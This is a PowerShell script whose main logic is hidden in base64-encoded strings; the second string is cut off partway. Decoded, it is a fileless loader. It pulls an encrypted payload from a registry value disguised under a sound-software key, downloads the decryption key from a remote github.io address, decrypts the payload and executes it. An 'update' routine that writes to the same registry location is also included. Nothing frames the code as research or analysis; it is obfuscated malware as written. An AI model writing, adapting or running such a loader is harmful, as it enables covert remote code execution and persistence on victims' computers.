
[CmdletBinding(SupportsShouldProcess)]
param()
$fname=(new-guid).Guid
$fname = $fname.substring(0,20)
$FullLogs = ""
$LogFilePath="$env:Temp\$fname.001"

$RegKeyRootPath="HKLM:\SOFTWARE\SoundIncorporated"
$RegKeyPath=Join-Path $RegKeyRootPath "Software\Controls\MediaSystems"
$RegKeyName="WinSec"
$FullRegKeyPath=Join-Path $RegKeyPath $RegKeyName


$Base64Command='DQAKAGYAdQBuAGMAdABpAG8AbgAgAEkAbgB2AG8AawBlAC0AQQBFAFMARQBuAGMAcgB5AHAAdABpAG8AbgAgAHsADQAKACAAIAAgACAAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAKQBdAA0ACgAgACAAIAAgAFsATwB1AHQAcAB1AHQAVAB5AHAAZQAoAFsAcwB0AHIAaQBuAGcAXQApAF0ADQAKACAAIAAgACAAUABhAHIAYQBtAA0ACgAgACAAIAAgACgADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB0AHIAdQBlACkAXQANAAoAIAAgACAAIAAgACAAIAAgAFsAVgBhAGwAaQBkAGEAdABlAFMAZQB0ACgAJwBFAG4AYwByAHkAcAB0ACcALAAgACcARABlAGMAcgB5AHAAdAAnACkAXQANAAoAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAE0AbwBkAGUALAANAAoADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAIAA9ACAAJAB0AHIAdQBlACkAXQANAAoAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAEsAZQB5ACwADQAKAA0ACgAgACAAIAAgACAAIAAgACAAWwBQAGEAcgBhAG0AZQB0AGUAcgAoAE0AYQBuAGQAYQB0AG8AcgB5ACAAPQAgACQAdAByAHUAZQAsACAAUABhAHIAYQBtAGUAdABlAHIAUwBlAHQATgBhAG0AZQAgAD0AIAAiAEMAcgB5AHAAdABUAGUAeAB0ACIAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBTAHQAcgBpAG4AZwBdACQAVABlAHgAdAAsAA0ACgANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKABNAGEAbgBkAGEAdABvAHIAeQAgAD0AIAAkAHQAcgB1AGUALAAgAFAAYQByAGEAbQBlAHQAZQByAFMAZQB0AE4AYQBtAGUAIAA9ACAAIgBDAHIAeQBwAHQARgBpAGwAZQAiACkAXQANAAoAIAAgACAAIAAgACAAIAAgAFsAUwB0AHIAaQBuAGcAXQAkAFAAYQB0AGgADQAKACAAIAAgACAAKQANAAoADQAKACAAIAAgACAAQgBlAGcAaQBuACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAcwBoAGEATQBhAG4AYQBnAGUAZAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAFMASABBADIANQA2AE0AYQBuAGEAZwBlAGQADQAKACAAIAAgACAAIAAgACAAIAAkAGEAZQBzAE0AYQBuAGEAZwBlAGQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBBAGUAcwBNAGEAbgBhAGcAZQBkAA0ACgAgACAAIAAgACAAIAAgACAAJABhAGUAcwBNAGEAbgBhAGcAZQBkAC4ATQBvAGQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBDAGkAcABoAGUAcgBNAG8AZABlAF0AOgA6AEMAQgBDAA0ACgAgACAAIAAgACAAIAAgACAAJABhAGUAcwBNAGEAbgBhAGcAZQBkAC4AUABhAGQAZABpAG4AZwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwBlAGMAdQByAGkAdAB5AC4AQwByAHkAcAB0AG8AZwByAGEAcABoAHkALgBQAGEAZABkAGkAbgBnAE0AbwBkAGUAXQA6ADoAWgBlAHIAbwBzAA0ACgAgACAAIAAgACAAIAAgACAAJABhAGUAcwBNAGEAbgBhAGcAZQBkAC4AQgBsAG8AYwBrAFMAaQB6AGUAIAA9ACAAMQAyADgADQAKACAAIAAgACAAIAAgACAAIAAkAGEAZQBzAE0AYQBuAGEAZwBlAGQALgBLAGUAeQBTAGkAegBlACAAPQAgADIANQA2AA0ACgAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgAFAAcgBvAGMAZQBzAHMAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABhAGUAcwBNAGEAbgBhAGcAZQBkAC4ASwBlAHkAIAA9ACAAJABzAGgAYQBNAGEAbgBhAGcAZQBkAC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQASwBlAHkAKQApAA0ACgANAAoAIAAgACAAIAAgACAAIAAgAHMAdwBpAHQAYwBoACAAKAAkAE0AbwBkAGUAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACcARQBuAGMAcgB5AHAAdAAnACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAVABlAHgAdAApACAAewAkAHAAbABhAGkAbgBCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAVABlAHgAdAApAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAFAAYQB0AGgAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEYAaQBsAGUAIAA9ACAARwBlAHQALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABQAGEAdABoACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACQARgBpAGwAZQAuAEYAdQBsAGwATgBhAG0AZQApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAVwByAGkAdABlAC0ARQByAHIAbwByACAALQBNAGUAcwBzAGEAZwBlACAAIgBGAGkAbABlACAAbgBvAHQAIABmAG8AdQBuAGQAIQAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABwAGwAYQBpAG4AQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAG8AdQB0AFAAYQB0AGgAIAA9ACAAJABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlACAAKwAgACIALgBhAGUAcwAiAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGMAcgB5AHAAdABvAHIAIAA9ACAAJABhAGUAcwBNAGEAbgBhAGcAZQBkAC4AQwByAGUAYQB0AGUARQBuAGMAcgB5AHAAdABvAHIAKAApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACAAPQAgACQAZQBuAGMAcgB5AHAAdABvAHIALgBUAHIAYQBuAHMAZgBvAHIAbQBGAGkAbgBhAGwAQgBsAG8AYwBrACgAJABwAGwAYQBpAG4AQgB5AHQAZQBzACwAIAAwACwAIAAkAHAAbABhAGkAbgBCAHkAdABlAHMALgBMAGUAbgBnAHQAaAApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQBuAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACAAPQAgACQAYQBlAHMATQBhAG4AYQBnAGUAZAAuAEkAVgAgACsAIAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAZQBzAE0AYQBuAGEAZwBlAGQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAFQAZQB4AHQAKQAgAHsAcgBlAHQAdQByAG4AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGUAbgBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwApAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAFAAYQB0AGgAKQAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEIANgA0AEMAaQBwAGgAZQByAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFMAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAbwB1AHQAUABhAHQAaAAgAC0AVgBhAGwAdQBlACAAJABCADYANABDAGkAcABoAGUAcgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACMAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAVwByAGkAdABlAEEAbABsAEIAeQB0AGUAcwAoACQAbwB1AHQAUABhAHQAaAAsACAAJABlAG4AYwByAHkAcAB0AGUAZABCAHkAdABlAHMAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACgARwBlAHQALQBJAHQAZQBtACAAJABvAHUAdABQAGEAdABoACkALgBMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlACAAPQAgACQARgBpAGwAZQAuAEwAYQBzAHQAVwByAGkAdABlAFQAaQBtAGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAByAGUAdAB1AHIAbgAgACIARgBpAGwAZQAgAGUAbgBjAHIAeQBwAHQAZQBkACAAdABvACAAJABvAHUAdABQAGEAdABoACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACcARABlAGMAcgB5AHAAdAAnACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAVABlAHgAdAApACAAewAkAGMAaQBwAGgAZQByAEIAeQB0AGUAcwAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABUAGUAeAB0ACkAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAUABhAHQAaAApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQARgBpAGwAZQAgAD0AIABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAFAAYQB0AGgAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACEAJABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlACkAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABXAHIAaQB0AGUALQBFAHIAcgBvAHIAIAAtAE0AZQBzAHMAYQBnAGUAIAAiAEYAaQBsAGUAIABuAG8AdAAgAGYAbwB1AG4AZAAhACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAjACQAYwBpAHAAaABlAHIAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAEIANgA0AEMAaQBwAGgAZQByACAAPQAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgACQARgBpAGwAZQAuAEYAdQBsAGwATgBhAG0AZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAYwBpAHAAaABlAHIAQgB5AHQAZQBzAD0AWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAQgA2ADQAQwBpAHAAaABlAHIAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAbwB1AHQAUABhAHQAaAAgAD0AIAAkAEYAaQBsAGUALgBGAHUAbABsAE4AYQBtAGUAIAAtAHIAZQBwAGwAYQBjAGUAIAAiAC4AYQBlAHMAIgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB9AA0ACgANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGEAZQBzAE0AYQBuAGEAZwBlAGQALgBJAFYAIAA9ACAAJABjAGkAcABoAGUAcgBCAHkAdABlAHMAWwAwAC4ALgAxADUAXQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGQAZQBjAHIAeQBwAHQAbwByACAAPQAgACQAYQBlAHMATQBhAG4AYQBnAGUAZAAuAEMAcgBlAGEAdABlAEQAZQBjAHIAeQBwAHQAbwByACgAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGQAZQBjAHIAeQBwAHQAZQBkAEIAeQB0AGUAcwAgAD0AIAAkAGQAZQBjAHIAeQBwAHQAbwByAC4AVAByAGEAbgBzAGYAbwByAG0ARgBpAG4AYQBsAEIAbABvAGMAawAoACQAYwBpAHAAaABlAHIAQgB5AHQAZQBzACwAIAAxADYALAAgACQAYwBpAHAAaABlAHIAQgB5AHQAZQBzAC4ATABlAG4AZwB0AGgAIAAtACAAMQA2ACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABhAGUAcwBNAGEAbgBhAGcAZQBkAC4ARABpAHMAcABvAHMAZQAoACkADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJABUAGUAeAB0ACkAIAB7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwByAHkAcAB0AGUAZABCAHkAdABlAHMAKQAuAFQAcgBpAG0AKABbAGMAaABhAHIAXQAwACkAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAUABhAHQAaAApACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFcAcgBpAHQAZQBBAGwAbABCAHkAdABlAHMAKAAkAG8AdQB0AFAAYQB0AGgALAAgACQAZABlAGMAcgB5AHAAdABlAGQAQgB5AHQAZQBzACkADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAbwB1AHQAUABhAHQAaAApAC4ATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAD0AIAAkAEYAaQBsAGUALgBMAGEAcwB0AFcAcgBpAHQAZQBUAGkAbQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIwByAGUAdAB1AHIAbgAgACIARgBpAGwAZQAgAGQAZQBjAHIAeQBwAHQAZQBkACAAdABvACAAJABvAHUAdABQAGEAdABoACIADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoADQAKACAAIAAgACAARQBuAGQAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABzAGgAYQBNAGEAbgBhAGcAZQBkAC4ARABpAHMAcABvAHMAZQAoACkADQAKACAAIAAgACAAIAAgACAAIAAkAGEAZQBzAE0AYQBuAGEAZwBlAGQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgANAAoADQAKACQAUgBlAGcASwBlAHkAUgBvAG8AdABQAGEAdABoAD0AIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABTAG8AdQBuAGQASQBuAGMAbwByAHAAbwByAGEAdABlAGQAIgANAAoAJABSAGUAZwBLAGUAeQBQAGEAdABoAD0ASgBvAGkAbgAtAFAAYQB0AGgAIAAkAFIAZQBnAEsAZQB5AFIAbwBvAHQAUABhAHQAaAAgACIAUwBvAGYAdAB3AGEAcgBlAFwAQwBvAG4AdAByAG8AbABzAFwATQBlAGQAaQBhAFMAeQBzAHQAZQBtAHMAIgANAAoAJABSAGUAZwBLAGUAeQBOAGEAbQBlAD0AIgBXAGkAbgBTAGUAYwAiAA0ACgAkAEYAdQBsAGwAUgBlAGcASwBlAHkAUABhAHQAaAA9AEoAbwBpAG4ALQBQAGEAdABoACAAJABSAGUAZwBLAGUAeQBQAGEAdABoACAAJABSAGUAZwBLAGUAeQBOAGEAbQBlAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBFAG4AYwByAHkAcAB0AGUAZABTAGMAcgBpAHAAdAAgAA0ACgB7AA0ACgAgACAAIAAgACQARABhAHQAYQA9ACgARwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQARgB1AGwAbABSAGUAZwBLAGUAeQBQAGEAdABoACAALQBOAGEAbQBlACAAJABSAGUAZwBLAGUAeQBOAGEAbQBlACkALgAkAFIAZQBnAEsAZQB5AE4AYQBtAGUADQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAEQAYQB0AGEADQAKAH0ADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABHAGUAdAAtAEMAbABlAGEAcgBTAGMAcgBpAHAAdAAgAA0ACgB7AA0ACgAgACAAIAAgACQAUwBlAGMAUABGAGkAbABlAD0AJwBoAHQAdABwAHMAOgAvAC8AdgByADkANwAyAGIAZQA3ADEANgBhADAANABlAGIANgAuAGcAaQB0AGgAdQBiAC4AaQBvAC8AZABhAHQALwBwAHMALgBkAGEAdAAnAA0ACgAgACAAIAAgACQAUABhAHMAcwAgAD0AIAAkAHcAZQBiAGMAbABpAGUAbgB0AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJABTAGUAYwBQAEYAaQBsAGUAKQANAAoAIAAgACAAIAAkAFAAYQBzAHMAIAA9ACAAJABQAGEAcwBzAC4AcwB1AGIAcwB0AHIAaQBuAGcAKAAwACwAMwAwACkADQAKAA0ACgAgACAAIAAgACQARQBuAGMAcgB5AHAAdABlAGQAUwBjAHIAaQBwAHQAPQBHAGUAdAAtAEUAbgBjAHIAeQBwAHQAZQBkAFMAYwByAGkAcAB0ACAADQAKAA0ACgAgACAAIAAgACQAUwBjAHIAaQBwAHQAQwBsAGUAYQByAD0ASQBuAHYAbwBrAGUALQBBAEUAUwBFAG4AYwByAHkAcAB0AGkAbwBuACAALQBNAG8AZABlACAARABlAGMAcgB5AHAAdAAgAC0ASwBlAHkAIAAkAFAAYQBzAHMAIAAtAFQAZQB4AHQAIAAkAEUAbgBjAHIAeQBwAHQAZQBkAFMAYwByAGkAcAB0AA0ACgANAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAUwBjAHIAaQBwAHQAQwBsAGUAYQByAA0ACgB9AA0ACgANAAoAJABDAGwAZQBhAHIAUwBjAHIAaQBwAHQAPQBHAGUAdAAtAEMAbABlAGEAcgBTAGMAcgBpAHAAdAAgAA0ACgAkAFMAYwByAGkAcAB0AEIAbABvAGMAawA9AFsAUwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AEMAcgBlAGEAdABlACgAJABDAGwAZQBhAHIAUwBjAHIAaQBwAHQAKQANAAoASQBuAHYAbwBrAGUALQBDAG8AbQBtAGEAbgBkACAALQBTAGMAcgBpAHAAdABCAGwAbwBjAGsAIAAkAFMAYwByAGkAcAB0AEIAbABvAGMAawA=
'


$UpdateCommandB64='DQAKAFsAQwBtAGQAbABlAHQAQgBpAG4AZABpAG4AZwAoAFMAdQBwAHAAbwByAHQAcwBTAGgAbwB1AGwAZABQAHIAbwBjAGUAcwBzACkAXQANAAoAcABhAHIAYQBtACgAKQANAAoAJABmAG4AYQBtAGUAPQAoAG4AZQB3AC0AZwB1AGkAZAApAC4ARwB1AGkAZAANAAoAJABmAG4AYQBtAGUAIAA9ACAAJABmAG4AYQBtAGUALgBzAHUAYgBzAHQAcgBpAG4AZwAoADAALAAyADAAKQANAAoAJABGAHUAbABsAEwAbwBnAHMAIAA9ACAAIgAiAA0ACgAkAEwAbwBnAEYAaQBsAGUAUABhAHQAaAA9ACIAJABlAG4AdgA6AFQAZQBtAHAAXAAkAGYAbgBhAG0AZQAuADAAMAAxACIADQAKAA0ACgAkAFIAZQBnAEsAZQB5AFIAbwBvAHQAUABhAHQAaAA9ACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwAUwBvAHUAbgBkAEkAbgBjAG8AcgBwAG8AcgBhAHQAZQBkACIADQAKACQAUgBlAGcASwBlAHkAUABhAHQAaAA9AEoAbwBpAG4ALQBQAGEAdABoACAAJABSAGUAZwBLAGUAeQBSAG8AbwB0AFAAYQB0AGgAIAAiAFMAbwBmAHQAdwBhAHIAZQBcAEMAbwBuAHQAcgBvAGwAcwBcAE0AZQBkAGkAYQBTAHkAcwB0AGUAbQBzACIADQAKACQAUgBlAGcASwBlAHkATgBhAG0AZQA9ACIAVwBpAG4AUwBlAGMAIgANAAoAJABGAHUAbABsAFIAZQBnAEsAZQB5AFAAYQB0AGgAPQBKAG8AaQBuAC0AUABhAHQAaAAgACQAUgBlAGcASwBlAHkAUABhAHQAaAAgACQAUgBlAGcASwBlAHkATgBhAG0AZQANAAoADQAKAA0ACgANAAoARgB1AG4AYwB0AGkAbwBuACAATwB1AHQAUwB0AHIAaQBuAGcADQAKAHsADQAKACAAIAAgACAAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAUwB1AHAAcABvAHIAdABzAFMAaABvAHUAbABkAFAAcgBvAGMAZQBzAHMAKQBdAA0ACgAgACAAIAAgAHAAYQByAGEAbQAgACgADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBWAGEAbABpAGQAYQB0AGUATgBvAHQATgB1AGwAbABPAHIARQBtAHAAdAB5ACgAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQATQBzAGcALAANAAoAIAAgACAAIAAgACAAIAAgAFsAUABhAHIAYQBtAGUAdABlAHIAKAApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBOAG8AdABOAHUAbABsAE8AcgBFAG0AcAB0AHkAKAApAF0ADQAKACAAIAAgACAAIAAgACAAIABbAFYAYQBsAGkAZABhAHQAZQBTAGUAdAAoACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcALAAnAFcAYQByAG4AaQBuAGcAJwAsACcARQByAHIAbwByACcAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAUwBlAHYAZQByAGkAdAB5ACAAPQAgACcASQBuAGYAbwByAG0AYQB0AGkAbwBuACcADQAKACAAIAAgACAAKQANAAoADQAKACAAIAAgACAAaQBmACgAJABlAG4AdgA6AEMATwBNAFAAVQBUAEUAUgBOAEEATQBFACAALQBsAGkAawBlACAAJwBNAEEAVgBFAFIASQBDAEsAJwApACAAewANAAoAIAAgACAAIAAgACAAIAAgAHcAcgBpAHQAZQAtAGgAbwBzAHQAIAAnAFsAaQBuAHMAdABhAGwAbABdACAAIAAgACcAIAAtAE4AbwBOAGUAdwBMAGkAbgBlACAALQBmACAAUgBlAGQADQAKACAAIAAgACAAIAAgACAAIAB3AHIAaQB0AGUALQBoAG8AcwB0ACAAJABNAHMAZwAgAC0AZgAgAEQAYQByAGsAWQBlAGwAbABvAHcADQAKACAAIAAgACAAfQANAAoAIAAgACAAIABXAHIAaQB0AGUALQBWAGUAcgBiAG8AcwBlACAAJABNAHMAZwANAAoAIAAgACAAIAANAAoAIAAgACAAIABbAHAAcwBjAHUAcwB0AG8AbQBvAGIAagBlAGMAdABdAEAAewANAAoAIAAgACAAIAAgACAAIAAgAFQAaQBtAGUAIAA9ACAAKABHAGUAdAAtAEQAYQB0AGUAIAAtAGYAIABnACkADQAKACAAIAAgACAAIAAgACAAIABNAGUAcwBzAGEAZwBlACAAPQAgACQATQBzAGcADQAKACAAIAAgACAAIAAgACAAIABTAGUAdgBlAHIAaQB0AHkAIAA9ACAAJABTAGUAdgBlAHIAaQB0AHkADQAKACAAIAAgACAAfQAgAHwAIABFAHgAcABvAHIAdAAtAEMAcwB2ACAALQBQAGEAdABoACAAJABMAG8AZwBGAGkAbABlAFAAYQB0AGgAIAAtAEEAcABwAGUAbgBkACAALQBOAG8AVAB5AHAAZQBJAG4AZgBvAHIAbQBhAHQAaQBvAG4ADQAKACAAIAAgACAAJABGAHUAbABsAEwAbwBnAHMAIAA9ACAAJABGAHUAbABsAEwAbwBnAHMAIAArACAAJABNAHMAZwAgACsAIAAnAGAAbgBgAG4AJwANAAoAfQANAAoADQAKAA0ACgBmAHUAbgBjAHQAaQBvAG4AIABTAGEAdgBlAC0AUwBjAHIAaQBwAHQARABhAHQAYQAgAHsADQAKACAAIAAgACAAWwBDAG0AZABsAGUAdABCAGkAbgBkAGkAbgBnACgAUwB1AHAAcABvAHIAdABzAFMAaABvAHUAbABkAFAAcgBvAGMAZQBzAHMAKQBdAA0ACgAgACAAIAAgAHAAYQByAGEAbQAgACgADQAKACAAIAAgACAAIAAgACAAIABbAFAAYQByAGEAbQBlAHQAZQByACgATQBhAG4AZABhAHQAbwByAHkAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBWAGEAbABpAGQAYQB0AGUATgBvAHQATgB1AGwAbABPAHIARQBtAHAAdAB5ACgAKQBdAA0ACgAgACAAIAAgACAAIAAgACAAWwBzAHQAcgBpAG4AZwBdACQAUwBjAHIAaQBwAHQARABhAHQAYQANAAoAIAAgACAAIAApAA0ACgANAAoAIAAgACAAIABpAGYAKABUAGUAcwB0AC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAUgBlAGcASwBlAHkAUgBvAG8AdABQAGEAdABoACkAewANAAoAIAAgACAA